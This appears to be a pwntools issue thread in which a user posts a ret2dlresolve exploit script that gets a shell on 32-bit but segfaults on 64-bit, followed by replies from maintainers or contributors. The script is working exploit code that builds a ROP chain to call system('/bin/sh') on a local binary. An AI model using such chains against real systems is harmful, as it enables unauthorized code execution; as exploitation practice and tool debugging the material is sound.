ret2dlresolve segfaulting.

[rectanglestuff]

get segfault for 64 bit, the 64+context.bytes are 72, and this seems to be the correct offset for the 64bit example.

on 32 bit
p.send(fit({76: rop.chain(), 200: dlresolve.payload}))
getting still a shell

from pwn import *

context.binary = elf = ELF('./main')
rop = ROP(elf)
dlresolve = Ret2dlresolvePayload(elf, symbol="system", args=["/bin/sh"])

rop.read(0, dlresolve.data_addr)
rop.ret2dlresolve(dlresolve)

raw_rop = rop.chain()
print(rop.dump())
print(64+context.bytes)

p = elf.process()
p.sendline(fit({64+context.bytes:rop.chain(), 200:dlresolve.payload}))
p.interactive()

[Arusekk]

Thank you for contributing to pwntools. In order for us to be able to help you, we need more information.

1. What have you done?
2. What did you expect?
3. What happened instead?
4. What version of pwntools are you using (pwn version), what scripts and binaries have you used, can we reproduce it too?

[RocketMaDev]

Try adding context.arch = 'amd64' at line 3? Pwntools have 32bit and 64bit payloads and 32bit is the default option.